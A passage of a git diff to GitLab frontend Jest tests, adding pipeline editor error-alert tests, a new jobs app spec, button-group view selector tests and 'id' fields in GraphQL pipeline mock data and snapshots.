PipelineEditorApp from '~/pipeline_editor/pipeline_editor_app.vue'; import PipelineEditorHome from '~/pipeline_editor/pipeline_editor_home.vue'; @@ -412,6 +411,94 @@ describe('Pipeline editor app component', () => { }); }); + describe('when multiple errors occurs in a row', () => { + const updateFailureMessage = 'The GitLab CI configuration could not be updated.'; + const unknownFailureMessage = 'The CI configuration was not loaded, please try again.'; + const unknownReasons = ['Commit failed']; + const alertErrorMessage = `${updateFailureMessage} ${unknownReasons[0]}`; + + const emitError = (type = COMMIT_FAILURE, reasons = unknownReasons) => + findEditorHome().vm.$emit('showError', { + type, + reasons, + }); + + beforeEach(async () => { + mockBlobContentData.mockResolvedValue(mockBlobContentQueryResponse); + mockCiConfigData.mockResolvedValue(mockCiConfigQueryResponse); + mockLatestCommitShaQuery.mockResolvedValue(mockCommitShaResults); + + window.scrollTo = jest.fn(); + + await createComponentWithApollo({ stubs: { PipelineEditorMessages } }); + await emitError(); + }); + + it('shows an error message for the first error', () => { + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + + it('scrolls to the top of the page to bring attention to the error message', () => { + expect(window.scrollTo).toHaveBeenCalledWith({ top: 0, behavior: 'smooth' }); + expect(window.scrollTo).toHaveBeenCalledTimes(1); + }); + + it('does not scroll to the top of the page if the same error occur multiple times in a row', async () => { + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(1); + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + + it('scrolls to the top if the error is different', async () => { + await emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + expect(window.scrollTo).toHaveBeenCalledTimes(2); + }); + + describe('when a user dismiss the alert', () => { + beforeEach(async () => { + await findAlert().vm.$emit('dismiss'); + }); + + it('shows an error if the type is the same, but the reason is different', async () => { + const newReason = 'Something broke'; + + await emitError(COMMIT_FAILURE, [newReason]); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(`${updateFailureMessage} ${newReason}`); + }); + + it('does not show an error or scroll if a new error with the same type occurs', async () => { + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(1); + expect(findAlert().exists()).toBe(false); + }); + + it('it shows an error and scroll when a new type is emitted', async () => { + await emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + }); + + it('it shows an error and scroll if a previously shown type happen again', async () => { + await emitError(LOAD_FAILURE_UNKNOWN, []); + + expect(window.scrollTo).toHaveBeenCalledTimes(2); + expect(findAlert().text()).toMatchInterpolatedText(unknownFailureMessage); + + await emitError(); + + expect(window.scrollTo).toHaveBeenCalledTimes(3); + expect(findAlert().text()).toMatchInterpolatedText(alertErrorMessage); + }); + }); + }); + describe('when add_new_config_file query param is present', () => { const originalLocation = window.location.href; diff --git a/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap b/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap index 60625d301c0..99de0d2a3ef 100644 --- a/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap +++ b/spec/frontend/pipelines/__snapshots__/utils_spec.js.snap @@ -6,9 +6,11 @@ Array [ "groups": Array [ Object { "__typename": "CiGroup", + "id": "4", "jobs": Array [ Object { "__typename": "CiJob", + "id": "6", "name": "build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl", "needs": Array [], "scheduledAt": null, @@ -18,6 +20,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "8", "path": "/root/abcd-dag/-/jobs/1482/retry", "title": "Retry", }, @@ -25,6 +28,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "7", "tooltip": "passed", }, }, @@ -36,14 +40,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "5", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "9", "jobs": Array [ Object { "__typename": "CiJob", + "id": "11", "name": "build_b", "needs": Array [], "scheduledAt": null, @@ -53,6 +60,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "13", "path": "/root/abcd-dag/-/jobs/1515/retry", "title": "Retry", }, @@ -60,6 +68,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "12", "tooltip": "passed", }, }, @@ -71,14 +80,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "10", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "14", "jobs": Array [ Object { "__typename": "CiJob", + "id": "16", "name": "build_c", "needs": Array [], "scheduledAt": null, @@ -88,6 +100,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "18", "path": "/root/abcd-dag/-/jobs/1484/retry", "title": "Retry", }, @@ -95,6 +108,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "17", "tooltip": "passed", }, }, @@ -106,14 +120,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "15", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "19", "jobs": Array [ Object { "__typename": "CiJob", + "id": "21", "name": "build_d 1/3", "needs": Array [], "scheduledAt": null, @@ -123,6 +140,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "23", "path": "/root/abcd-dag/-/jobs/1485/retry", "title": "Retry", }, @@ -130,11 +148,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "22", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "24", "name": "build_d 2/3", "needs": Array [], "scheduledAt": null, @@ -144,6 +164,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "26", "path": "/root/abcd-dag/-/jobs/1486/retry", "title": "Retry", }, @@ -151,11 +172,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "25", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "27", "name": "build_d 3/3", "needs": Array [], "scheduledAt": null, @@ -165,6 +188,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "29", "path": "/root/abcd-dag/-/jobs/1487/retry", "title": "Retry", }, @@ -172,6 +196,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "28", "tooltip": "passed", }, }, @@ -183,14 +208,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "20", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "57", "jobs": Array [ Object { "__typename": "CiJob", + "id": "59", "name": "test_c", "needs": Array [], "scheduledAt": null, @@ -201,6 +229,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "60", "tooltip": null, }, }, @@ -212,6 +241,7 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "58", "label": null, }, }, @@ -226,9 +256,11 @@ Array [ "groups": Array [ Object { "__typename": "CiGroup", + "id": "32", "jobs": Array [ Object { "__typename": "CiJob", + "id": "34", "name": "test_a", "needs": Array [ "build_c", @@ -242,6 +274,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "36", "path": "/root/abcd-dag/-/jobs/1514/retry", "title": "Retry", }, @@ -249,6 +282,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "35", "tooltip": "passed", }, }, @@ -260,14 +294,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "33", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "40", "jobs": Array [ Object { "__typename": "CiJob", + "id": "42", "name": "test_b 1/2", "needs": Array [ "build_d 3/3", @@ -283,6 +320,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "44", "path": "/root/abcd-dag/-/jobs/1489/retry", "title": "Retry", }, @@ -290,11 +328,13 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "43", "tooltip": "passed", }, }, Object { "__typename": "CiJob", + "id": "67", "name": "test_b 2/2", "needs": Array [ "build_d 3/3", @@ -310,6 +350,7 @@ Array [ "__typename": "StatusAction", "buttonTitle": "Retry this job", "icon": "retry", + "id": "51", "path": "/root/abcd-dag/-/jobs/1490/retry", "title": "Retry", }, @@ -317,6 +358,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "50", "tooltip": "passed", }, }, @@ -328,14 +370,17 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "41", "label": "passed", }, }, Object { "__typename": "CiGroup", + "id": "61", "jobs": Array [ Object { "__typename": "CiJob", + "id": "53", "name": "test_d", "needs": Array [ "build_b", @@ -348,6 +393,7 @@ Array [ "group": "success", "hasDetails": true, "icon": "status_success", + "id": "64", "tooltip": null, }, }, @@ -359,6 +405,7 @@ Array [ "__typename": "DetailedStatus", "group": "success", "icon": "status_success", + "id": "62", "label": null, }, }, diff --git a/spec/frontend/pipelines/components/jobs/jobs_app_spec.js b/spec/frontend/pipelines/components/jobs/jobs_app_spec.js new file mode 100644 index 00000000000..1ea6096c922 --- /dev/null +++ b/spec/frontend/pipelines/components/jobs/jobs_app_spec.js @@ -0,0 +1,106 @@ +import { GlIntersectionObserver, GlSkeletonLoader } from '@gitlab/ui'; +import { createLocalVue, shallowMount } from '@vue/test-utils'; +import VueApollo from 'vue-apollo'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import createFlash from '~/flash'; +import JobsApp from '~/pipelines/components/jobs/jobs_app.vue'; +import JobsTable from '~/jobs/components/table/jobs_table.vue'; +import getPipelineJobsQuery from '~/pipelines/graphql/queries/get_pipeline_jobs.query.graphql'; +import { mockPipelineJobsQueryResponse } from '../../mock_data'; + +const localVue = createLocalVue(); +localVue.use(VueApollo); + +jest.mock('~/flash'); + +describe('Jobs app', () => { + let wrapper; + let resolverSpy; + + const findSkeletonLoader = () => wrapper.findComponent(GlSkeletonLoader); + const findJobsTable = () => wrapper.findComponent(JobsTable); + + const triggerInfiniteScroll = () => + wrapper.findComponent(GlIntersectionObserver).vm.$emit('appear'); + + const createMockApolloProvider = (resolver) => { + const requestHandlers = [[getPipelineJobsQuery, resolver]]; + + return createMockApollo(requestHandlers); + }; + + const createComponent = (resolver) => { + wrapper = shallowMount(JobsApp, { + provide: { + fullPath: 'root/ci-project', + pipelineIid: 1, + }, + localVue, + apolloProvider: createMockApolloProvider(resolver), + }); + }; + + beforeEach(() => { + resolverSpy = jest.fn().mockResolvedValue(mockPipelineJobsQueryResponse); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('displays the loading state', () => { + createComponent(resolverSpy); + + expect(findSkeletonLoader().exists()).toBe(true); + expect(findJobsTable().exists()).toBe(false); + }); + + it('displays the jobs table', async () => { + createComponent(resolverSpy); + + await waitForPromises(); + + expect(findJobsTable().exists()).toBe(true); + expect(findSkeletonLoader().exists()).toBe(false); + expect(createFlash).not.toHaveBeenCalled(); + }); + + it('handles job fetch error correctly', async () => { + resolverSpy = jest.fn().mockRejectedValue(new Error('GraphQL error')); + + createComponent(resolverSpy); + + await waitForPromises(); + + expect(createFlash).toHaveBeenCalledWith({ + message: 'An error occured while fetching the pipelines jobs.', + }); + }); + + it('handles infinite scrolling by calling fetchMore', async () => { + createComponent(resolverSpy); + + await waitForPromises(); + + triggerInfiniteScroll(); + + expect(resolverSpy).toHaveBeenCalledWith({ + after: 'eyJpZCI6Ijg0NyJ9', + fullPath: 'root/ci-project', + iid: 1, + }); + }); + + it('does not display main loading state again after fetchMore', async () => { + createComponent(resolverSpy); + + expect(findSkeletonLoader().exists()).toBe(true); + + await waitForPromises(); + + triggerInfiniteScroll(); + + expect(findSkeletonLoader().exists()).toBe(false); + }); +}); diff --git a/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js b/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js index db4de6deeb7..04e004dc6c1 100644 --- a/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js +++ b/spec/frontend/pipelines/graph/graph_component_wrapper_spec.js @@ -1,7 +1,7 @@ -import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlButton, GlButtonGroup, GlLoadingIcon } from '@gitlab/ui'; import { mount, shallowMount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; -import Vue from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import { useLocalStorageSpy } from 'helpers/local_storage_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -98,7 +98,6 @@ describe('Pipeline graph wrapper', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); beforeAll(() => { @@ -136,7 +135,7 @@ describe('Pipeline graph wrapper', () => { beforeEach(async () => { createComponentWithApollo(); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ -165,7 +164,7 @@ describe('Pipeline graph wrapper', () => { getPipelineDetailsHandler: jest.fn().mockRejectedValue(new Error('GraphQL error')), }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ -189,7 +188,7 @@ describe('Pipeline graph wrapper', () => { }, }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not display the loading icon', () => { @@ -211,7 +210,7 @@ describe('Pipeline graph wrapper', () => { createComponentWithApollo(); jest.spyOn(wrapper.vm.$apollo.queries.headerPipeline, 'refetch'); jest.spyOn(wrapper.vm.$apollo.queries.pipeline, 'refetch'); - await wrapper.vm.$nextTick(); + await nextTick(); getGraph().vm.$emit('refreshPipelineGraph'); }); @@ -225,8 +224,8 @@ describe('Pipeline graph wrapper', () => { describe('when query times out', () => { const advanceApolloTimers = async () => { jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); - await wrapper.vm.$nextTick(); + await nextTick(); + await nextTick(); }; beforeEach(async () => { @@ -246,7 +245,7 @@ describe('Pipeline graph wrapper', () => { .mockResolvedValueOnce(errorData); createComponentWithApollo({ getPipelineDetailsHandler: failSucceedFail }); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('shows correct errors and does not overwrite populated data when data is empty', async () => { @@ -276,7 +275,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('appears when pipeline uses needs', () => { @@ -319,7 +318,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('sets showLinks to true', async () => { @@ -329,7 +328,7 @@ describe('Pipeline graph wrapper', () => { expect(getViewSelector().props('type')).toBe(LAYER_VIEW); await getDependenciesToggle().vm.$emit('change', true); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); expect(wrapper.findComponent(LinksLayer).props('showLinks')).toBe(true); }); }); @@ -345,7 +344,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('shows the hover tip in the view selector', async () => { @@ -366,7 +365,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not show the hover tip', async () => { @@ -384,7 +383,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); afterEach(() => { @@ -393,9 +392,10 @@ describe('Pipeline graph wrapper', () => { it('reads the view type from localStorage when available', () => { const viewSelectorNeedsSegment = wrapper - .findAll('[data-testid="pipeline-view-selector"] > label') + .find(GlButtonGroup) + .findAllComponents(GlButton) .at(1); - expect(viewSelectorNeedsSegment.classes()).toContain('active'); + expect(viewSelectorNeedsSegment.classes()).toContain('selected'); }); }); @@ -412,7 +412,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); afterEach(() => { @@ -435,7 +435,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('does not appear when pipeline does not use needs', () => { @@ -462,7 +462,7 @@ describe('Pipeline graph wrapper', () => { beforeEach(async () => { createComponentWithApollo(); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('is not called', () => { @@ -506,7 +506,7 @@ describe('Pipeline graph wrapper', () => { }); jest.runOnlyPendingTimers(); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('attempts to collect metrics', () => { diff --git a/spec/frontend/pipelines/graph/graph_view_selector_spec.js b/spec/frontend/pipelines/graph/graph_view_selector_spec.js index f4faa25545b..f574f4dccc5 100644 --- a/spec/frontend/pipelines/graph/graph_view_selector_spec.js +++ b/spec/frontend/pipelines/graph/graph_view_selector_spec.js @@ -1,4 +1,4 @@ -import { GlAlert, GlLoadingIcon, GlSegmentedControl } from '@gitlab/ui'; +import { GlAlert, GlButton, GlButtonGroup, GlLoadingIcon } from '@gitlab/ui'; import { mount, shallowMount } from '@vue/test-utils'; import { LAYER_VIEW, STAGE_VIEW } from '~/pipelines/components/graph/constants'; import GraphViewSelector from '~/pipelines/components/graph/graph_view_selector.vue'; @@ -7,9 +7,9 @@ describe('the graph view selector component', () => { let wrapper; const findDependenciesToggle = () => wrapper.find('[data-testid="show-links-toggle"]'); - const findViewTypeSelector = () => wrapper.findComponent(GlSegmentedControl); - const findStageViewLabel = () => findViewTypeSelector().findAll('label').at(0); - const findLayersViewLabel = () => findViewTypeSelector().findAll('label').at(1); + const findViewTypeSelector = () => wrapper.findComponent(GlButtonGroup); + const findStageViewButton = () => findViewTypeSelector().findAllComponents(GlButton).at(0); + const findLayerViewButton = () => findViewTypeSelector().findAllComponents(GlButton).at(1); const findSwitcherLoader = () => wrapper.find('[data-testid="switcher-loading-state"]'); const findToggleLoader = () => findDependenciesToggle().find(GlLoadingIcon); const findHoverTip = () => wrapper.findComponent(GlAlert); @@ -51,8 +51,13 @@ describe('the graph view selector component', () => { createComponent({ mountFn: mount }); }); - it('shows the Stage view label as active in the selector', () => { - expect(findStageViewLabel().classes()).toContain('active'); + it('shows the Stage view button as selected', () => { + expect(findStageViewButton().classes('selected')).toBe(true); + }); + + it('shows the Job dependencies view button not selected', () => { + expect(findLayerViewButton().exists()).toBe(true); + expect(findLayerViewButton().classes('selected')).toBe(false); }); it('does not show the Job dependencies (links) toggle', () => { @@ -70,8 +75,13 @@ describe('the graph view selector component', () => { }); }); - it('shows the Job dependencies view label as active in the selector', () => { - expect(findLayersViewLabel().classes()).toContain('active'); + it('shows the Job dependencies view as selected', () => { + expect(findLayerViewButton().classes('selected')).toBe(true); + }); + + it('shows the Stage button as not selected', () => { + expect(findStageViewButton().exists()).toBe(true); + expect(findStageViewButton().classes('selected')).toBe(false); }); it('shows the Job dependencies (links) toggle', () => { @@ -94,7 +104,7 @@ describe('the graph view selector component', () => { expect(wrapper.emitted().updateViewType).toBeUndefined(); expect(findSwitcherLoader().exists()).toBe(false); - await findStageViewLabel().trigger('click'); + await findStageViewButton().trigger('click'); /* Loading happens before the event is emitted or timers are run. Then we run the timer because the event is emitted in setInterval @@ -123,6 +133,14 @@ describe('the graph view selector component', () => { expect(wrapper.emitted().updateShowLinksState).toHaveLength(1); expect(wrapper.emitted().updateShowLinksState).toEqual([[true]]); }); + + it('does not emit an event if the click occurs on the currently selected view button', async () => { + expect(wrapper.emitted().updateShowLinksState).toBeUndefined(); + + await findLayerViewButton().trigger('click'); + + expect(wrapper.emitted().updateShowLinksState).toBeUndefined(); + }); }); describe('hover tip callout', () => { diff --git a/spec/frontend/pipelines/graph/mock_data.js b/spec/frontend/pipelines/graph/mock_data.js index 3812483766d..dcbbde7bf36 100644 --- a/spec/frontend/pipelines/graph/mock_data.js +++ b/spec/frontend/pipelines/graph/mock_data.js @@ -4,6 +4,7 @@ export const mockPipelineResponse = { data: { project: { __typename: 'Project', + id: '1', pipeline: { __typename: 'Pipeline', id: 163, @@ -21,9 +22,11 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiStage', + id: '2', name: 'build', status: { __typename: 'DetailedStatus', + id: '3', action: null, }, groups: { @@ -31,10 +34,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiGroup', + id: '4', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', size: 1, status: { __typename: 'DetailedStatus', + id: '5', label: 'passed', group: 'success', icon: 'status_success', @@ -44,10 +49,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '6', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '7', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -55,6 +62,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '8', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1482/retry', @@ -72,9 +80,11 @@ export const mockPipelineResponse = { { __typename: 'CiGroup', name: 'build_b', + id: '9', size: 1, status: { __typename: 'DetailedStatus', + id: '10', label: 'passed', group: 'success', icon: 'status_success', @@ -84,10 +94,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '11', name: 'build_b', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '12', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -95,6 +107,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '13', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1515/retry', @@ -111,10 +124,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '14', name: 'build_c', size: 1, status: { __typename: 'DetailedStatus', + id: '15', label: 'passed', group: 'success', icon: 'status_success', @@ -124,10 +139,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '16', name: 'build_c', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '17', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -135,6 +152,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '18', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1484/retry', @@ -151,10 +169,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '19', name: 'build_d', size: 3, status: { __typename: 'DetailedStatus', + id: '20', label: 'passed', group: 'success', icon: 'status_success', @@ -164,10 +184,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '21', name: 'build_d 1/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '22', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -175,6 +197,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '23', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1485/retry', @@ -188,10 +211,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '24', name: 'build_d 2/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '25', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -199,6 +224,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '26', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1486/retry', @@ -212,10 +238,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '27', name: 'build_d 3/3', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '28', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -223,6 +251,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '29', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1487/retry', @@ -242,9 +271,11 @@ export const mockPipelineResponse = { }, { __typename: 'CiStage', + id: '30', name: 'test', status: { __typename: 'DetailedStatus', + id: '31', action: null, }, groups: { @@ -252,10 +283,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiGroup', + id: '32', name: 'test_a', size: 1, status: { __typename: 'DetailedStatus', + id: '33', label: 'passed', group: 'success', icon: 'status_success', @@ -265,10 +298,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '34', name: 'test_a', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '35', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -276,6 +311,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '36', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1514/retry', @@ -287,14 +323,17 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '37', name: 'build_c', }, { __typename: 'CiBuildNeed', + id: '38', name: 'build_b', }, { __typename: 'CiBuildNeed', + id: '39', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -306,10 +345,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '40', name: 'test_b', size: 2, status: { __typename: 'DetailedStatus', + id: '41', label: 'passed', group: 'success', icon: 'status_success', @@ -319,10 +360,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '42', name: 'test_b 1/2', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '43', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -330,6 +373,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '44', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1489/retry', @@ -341,22 +385,27 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '45', name: 'build_d 3/3', }, { __typename: 'CiBuildNeed', + id: '46', name: 'build_d 2/3', }, { __typename: 'CiBuildNeed', + id: '47', name: 'build_d 1/3', }, { __typename: 'CiBuildNeed', + id: '48', name: 'build_b', }, { __typename: 'CiBuildNeed', + id: '49', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -365,10 +414,12 @@ export const mockPipelineResponse = { }, { __typename: 'CiJob', + id: '67', name: 'test_b 2/2', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '50', icon: 'status_success', tooltip: 'passed', hasDetails: true, @@ -376,6 +427,7 @@ export const mockPipelineResponse = { group: 'success', action: { __typename: 'StatusAction', + id: '51', buttonTitle: 'Retry this job', icon: 'retry', path: '/root/abcd-dag/-/jobs/1490/retry', @@ -387,22 +439,27 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '52', name: 'build_d 3/3', }, { __typename: 'CiBuildNeed', + id: '53', name: 'build_d 2/3', }, { __typename: 'CiBuildNeed', + id: '54', name: 'build_d 1/3', }, { __typename: 'CiBuildNeed', + id: '55', name: 'build_b', }, { __typename: 'CiBuildNeed', + id: '56', name: 'build_a_nlfjkdnlvskfnksvjknlfdjvlvnjdkjdf_nvjkenjkrlngjeknjkl', }, @@ -415,9 +472,11 @@ export const mockPipelineResponse = { { __typename: 'CiGroup', name: 'test_c', + id: '57', size: 1, status: { __typename: 'DetailedStatus', + id: '58', label: null, group: 'success', icon: 'status_success', @@ -427,10 +486,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '59', name: 'test_c', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '60', icon: 'status_success', tooltip: null, hasDetails: true, @@ -448,9 +509,11 @@ export const mockPipelineResponse = { }, { __typename: 'CiGroup', + id: '61', name: 'test_d', size: 1, status: { + id: '62', __typename: 'DetailedStatus', label: null, group: 'success', @@ -461,10 +524,12 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiJob', + id: '53', name: 'test_d', scheduledAt: null, status: { __typename: 'DetailedStatus', + id: '64', icon: 'status_success', tooltip: null, hasDetails: true, @@ -477,6 +542,7 @@ export const mockPipelineResponse = { nodes: [ { __typename: 'CiBuildNeed', + id: '65', name: 'build_b', }, ], @@ -502,6 +568,7 @@ export const downstream = { iid: '31', path: '/root/elemenohpee/-/pipelines/175', status: { + id: '70', group: 'success', label: 'passed', icon: 'status_success', @@ -509,6 +576,7 @@ export const downstream = { }, sourceJob: { name: 'test_c', + id: '71', __typename: 'CiJob', }, project: { @@ -525,12 +593,14 @@ export const downstream = { iid: '27', path: '/root/abcd-dag/-/pipelines/181', status: { + id: '72', group: 'success', label: 'passed', icon: 'status_success', __typename: 'DetailedStatus', }, sourceJob: { + id: '73', name: 'test_d', __typename: 'CiJob', }, @@ -551,6 +621,7 @@ export const upstream = { iid: '24', path: '/root/abcd-dag/-/pipelines/161', status: { + id: '74', group: 'success', label: 'passed', icon: 'status_success', @@ -571,6 +642,7 @@ export const wrappedPipelineReturn = { data: { project: { __typename: 'Project', + id: '75', pipeline: { __typename: 'Pipeline', id: 'gid://gitlab/Ci::Pipeline/175', @@ -592,12 +664,14 @@ export const wrappedPipelineReturn = { __typename: 'Pipeline', status: { __typename: 'DetailedStatus', + id: '77', group: 'success', label: 'passed', icon: 'status_success', }, sourceJob: { name: 'test_c', + id: 